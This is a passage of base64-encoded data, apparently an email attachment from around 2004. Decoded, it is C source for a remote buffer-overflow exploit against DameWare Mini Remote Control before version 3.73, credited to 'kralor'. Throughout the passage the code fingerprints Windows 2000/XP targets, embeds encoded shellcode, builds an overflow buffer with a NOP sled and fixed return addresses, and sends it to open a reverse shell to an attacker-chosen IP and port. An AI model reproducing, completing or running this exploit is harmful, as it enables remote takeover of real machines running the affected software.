Ilx4MGZceDk2XHg0Nlx4NTJceDk3XHg1NVx4M2RceDk0XHg5NFx4ZmZceDg1XHhjMFx4NmFceGUw
XHgzMVx4NmEiDQogICAgICAgICJceDQ1XHhmZFx4ZjBceGU2XHhlNlx4ZDRceGZmXHg5Zlx4ZmZc
eGRlXHhmZlx4OTVceDdkXHg1MVx4NmJceDZhIg0KICAgICAgICAiXHg2YVx4YTZceDRlXHg1Mlx4
ZDBceDM5XHhkMVx4OTVceDk1XHg5NVx4MWNceGM4XHgyNVx4MWNceGM4XHgyZCINCiAgICAgICAg
Ilx4MWNceGM4XHgyMVx4MWNceGM4XHgyOVx4MWNceGM4XHg1NVx4MWNceGM4XHg1MVx4MWNceGM4
XHg1ZFx4NTIiDQogICAgICAgICJceGQwXHg0ZFx4OTRceDk0XHg5NVx4OTVceDFjXHhjOFx4NDlc
eDFjXHhjOFx4NzVceDFlXHhkOFx4MzFceDFjIg0KICAgICAgICAiXHhkOFx4NzFceDFjXHhkOFx4
N2RceDFjXHhkOFx4NzlceDE4XHhkOFx4NjVceGM0XHgxOFx4ZDhceDM5XHhjNCINCiAgICAgICAg
Ilx4YzZceGM2XHhjNlx4ZmZceDk0XHhjNlx4YzZceGYzXHg1Mlx4ZDBceDY5XHhmNlx4ZjhceGYz
XHg1Mlx4ZDAiDQogICAgICAgICJceDZiXHhmMVx4OTVceDFkXHhjOFx4NmFceDE4XHhjMFx4Njlc
eGM3XHhjNlx4NmFceDQ1XHhmZFx4ZWRceGZjIg0KICAgICAgICAiXHhlMVx4YzFceGZmXHg5NFx4
ZmZceGRlXHhmZlx4OTVceDdkXHhjZFx4NmJceDZhXHg2YVx4NmEiOw0KDQoJc2l6ZT1yZWN2KHNv
Y2ssYnVmZmVyLFNJWkVPRiwwKTsNCglpZihidWZmZXJbMF0hPTB4MzB8fGJ1ZmZlclsxXSE9MHgx
MSkgew0KCQlwcmludGYoImVycm9yOiB3cm9uZyBkYXRhIHJlY2VpdmVkXHJcbiIpOw0KCQlyZXR1
cm4gLTE7DQoJCX0NCglidWZmZXJbMjhdPTB4MDA7YnVmZmVyWzM2XT0weDAxOw0KCXNlbmQoc29j
ayxidWZmZXIsc2l6ZSwwKTsNCgltZW1zZXQoYnVmZmVyLDAsU0laRU9GKTsNCglwcmludGYoIlsr
XSBHYXRoZXJpbmcgJS0zMHMgICAgIC4uLiIsImluZm9ybWF0aW9uIik7DQoJZm9yKHNpemU9MDtz
aXplPDQwOTY7c2l6ZSs9cmVjdihzb2NrLCZidWZmZXJbc2l6ZV0sU0laRU9GLDApKTsNCg0KCWlm
KGJ1ZmZlclswXSE9MHgxMHx8YnVmZmVyWzFdIT0weDI3KSB7DQoJCXByaW50ZigiZXJyb3I6IHdy
b25nIGRhdGEgcmVjZWl2ZWRcclxuIik7DQoJCXJldHVybiAtMTsNCgl9DQoJcHJpbnRmKCJEb25l
XHJcbiIpOw0KCXByaW50ZigiW2ldIE9wZXJhdGluZyBzeXN0ZW0gOiAiKTsNCglpZihidWZmZXJb
MTZdPT0weDI4fHxidWZmZXJbMTddPT0weDBhKSB7DQoJb3M9MTsNCglwcmludGYoIldpblhQIik7
DQoJfSBlbHNlIHsNCgkJcHJpbnRmKCJXaW4yMDAwIik7DQoJCW9zPTA7DQoJfQ0KCXByaW50Zigi
XHJcbltpXSBTZXJ2aWNlIFBhY2sgICAgIDogJXNcclxuIiwhYnVmZmVyWzM3XT8iMCI6JmJ1ZmZl
clszN10pOw0KCXByaW50ZigiWytdIFNldHRpbmcgc2hlbGxjMGRlIGZvciB0aGlzICUtMTVzICAg
Li4uIiwidmVyc2lvbiIpOw0KCXNldF9zYyhvcyxyaG9zdCxycG9ydCxzaGVsbGMwZGUpOw0KCQ0K
CW1lbXNldCgmYnVmZmVyWzJdLDAsU0laRU9GLTIpOw0KCXN0cmNweSgmYnVmZmVyWzE3NV0sV0lO
VVNFUik7DQoJbWVtc2V0KCZidWZmZXJbNDE2XSwweDkwLDE4MCk7DQoJcHJpbnRmKCJEb25lXHJc
biIpOw0KaWYob3M9PTApDQoJbWVtY3B5KCZidWZmZXJbNTE2XSxSRVRfV0lOMmssNCk7DQplbHNl
IHsNCglpZih2YXI9PTApIHsNCglwcmludGYoIlshXSBVc2luZyAweDc3MzZkNTA3IGFzIHJldCBh
ZGRyXHJcbiIpOw0KCW1lbWNweSgmYnVmZmVyWzUxNl0sUkVUX1hQX1ZBUjAsNCk7DQoJfSBlbHNl
IHsNCgkJaWYodmFyPT0xKSB7DQoJbWVtY3B5KCZidWZmZXJbNTE2XSxSRVRfWFBfVkFSMSw0KTsN
CglwcmludGYoIlshXSBVc2luZyAweDc3MzUxY2MxIGFzIHJldCBhZGRyXHJcbiIpOw0KCQl9IGVs
c2Ugew0KCW1lbWNweSgmYnVmZmVyWzUxNl0sUkVUX1hQX1ZBUjIsNCk7DQoJcHJpbnRmKCJbIV0g
VXNpbmcgMHg3NzM5MWNjMSBhcyByZXQgYWRkclxyXG4iKTsNCgkJfQ0KCX0NCn0NCgltZW1jcHko
JmJ1ZmZlcls1MjBdLHNoZWxsYzBkZSxzaXplb2Yoc2hlbGxjMGRlKSk7DQoJc3RyY3B5KCZidWZm
ZXJbMTIwMF0sV0lOSE9TVCk7c3RyY3B5KCZidWZmZXJbOTc1XSxVU0VSUFJPRklMRV9OQU1FKTsN
CglzdHJjcHkoJmJ1ZmZlclsxMjk1XSxVU0VSUFJPRklMRV9DT01QQU5ZKTtzdHJjcHkoJmJ1ZmZl
clsxNDk1XSxVU0VSUFJPRklMRV9MSUNFTlNFKTsNCglzdHJjcHkoJmJ1ZmZlclsxNzU1XSxVU0VS
UFJPRklMRV9EQVRFKTtzdHJjcHkoJmJ1ZmZlclsyMDE1XSxXSU5IT1NUKTsNCglzdHJjcHkoJmJ1
ZmZlclsyMjc1XSxJTlRFUkZBQ0VfSVApO3N0cmNweSgmYnVmZmVyWzI1MzVdLFdJTkRPTUFJTik7
DQoJc3RyY3B5KCZidWZmZXJbMjc5NV0sQ0xJRU5UX1ZFUlNJT04pOw0KDQoJcHJpbnRmKCJbK10g
U2VuZGluZyBldmlsICUtMzBzICAuLi4iLCJwYWNrZXQiKTsNCglzZW5kKHNvY2ssYnVmZmVyLFNJ
WkVPRiwwKTsNCgltZW1zZXQoYnVmZmVyLDAsU0laRU9GKTsNCglzaXplPXJlY3Yoc29jayxidWZm
ZXIsU0laRU9GLDApOw0KDQoJaWYoYnVmZmVyWzBdIT0weDMyfHxidWZmZXJbMV0hPTB4MTEpIHsN
CgkJcHJpbnRmKCJQYXRjaGVkXHJcbiIpOw0KCQlyZXR1cm4gLTE7DQoJfQ0KCXByaW50ZigiRG9u
ZVxyXG4iKTsNCglwcmludGYoIltpXSBTaGVsbCBzaG91bGQgYmUgYXJyaXZlZCBhdCAlczolZFxy
XG4iLHJob3N0LHJwb3J0KTsNCglyZXR1cm4gMDsNCn0NCg0Kdm9pZCBiYW5uZXIodm9pZCkNCnsN
CglwcmludGYoIlxyXG4gIFtDcnB0XSBEYW1lV2FyZSBNaW5pIFJlbW90ZSBDb250cm9sIDwgdjMu
NzMgcmVtb3RlIGV4cGxvaXQgYnkga3JhbG9yIFtDcnB0XVxyXG4iKTsNCglwcmludGYoIlx0XHQg
IHd3dy5jb3JvbXB1dGVyLm5ldCAmJiB1bmRlcm5ldCAjY29yb21wdXRlclxyXG5cclxuIik7DQoJ
cmV0dXJuOw0KfQ0Kdm9pZCBzeW50YXgoY2hhciAqcHJvZykNCnsNCglwcmludGYoInN5bnRheDog
JXMgPGhvc3Q+IDx5b3VyX2lwPiA8eW91cl9wb3J0PiBbd2luWFAgdmFyaWFudF1cclxuIixwcm9n
KTsNCglwcmludGYoIndpblhQIHZhcmlhbnRlOlxyXG4iKTsNCglwcmludGYoIiAgICAgICAgICAg
ICAgIDAgd2lsbCB1c2UgMHg3NzM2ZDUwNyBhcyBlaXAgW2ZvdW5kIG9uIG1hbnkgWFBzXVtkZWZh
dWx0XVxyXG4iKTsNCglwcmludGYoIiAgICAgICAgICAgICAgIDEgd2lsbCB1c2UgMHg3NzM1MWNj
MSBhcyBlaXAgW2ZvdW5kIG9uIG1hbnkgWFBzXVxyXG4iKTsNCglwcmludGYoIiAgICAgICAgICAg
ICAgIDIgd2lsbCB1c2UgMHg3NzM5MWNjMSBhcyBlaXAgW2ZvdW5kIG9uIG9uZSBYUCBzcDBdXHJc
biIpOw0KCXJldHVybjsNCn0NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQoJ
V1NBREFUQSB3c2FEYXRhOw0KCWludCBzb2NrLHZhcj0wOw0KDQoJYmFubmVyKCk7DQoJaWYoYXJn
Yzw0fHxhcmdjPjUpIHsNCgkJc3ludGF4KGFyZ3ZbMF0pOw0KCQlyZXR1cm4gLTE7DQoJCX0NCmlm
KGFyZ2M9PTUpIHsNCgl2YXI9YXRvaShhcmd2WzRdKTsNCglpZih2YXI+Mnx8dmFyPDApIHsNCgkJ
c3ludGF4KGFyZ3ZbMF0pOw0KCQlyZXR1cm4gLTE7DQoJCX0NCgl9DQppZihXU0FTdGFydHVwKDB4
MDEwMSwmd3NhRGF0YSkhPTApIHsNCglwcmludGYoImVycm9yOiB1bmFibGUgdG8gbG9hZCB3aW5z
b2NrXHJcbiIpOw0KCXJldHVybiAtMTsNCgl9DQoJc29jaz1jbngoYXJndlsxXSk7DQppZighc29j
aykNCglyZXR1cm4gLTE7DQoJc3RhcnRfYXV0aChzb2NrLGFyZ3ZbMl0sYXRvaShhcmd2WzNdKSx2
YXIpOw0KCXJldHVybiAwOw0KfQ0K
------=_20040110193158_35264--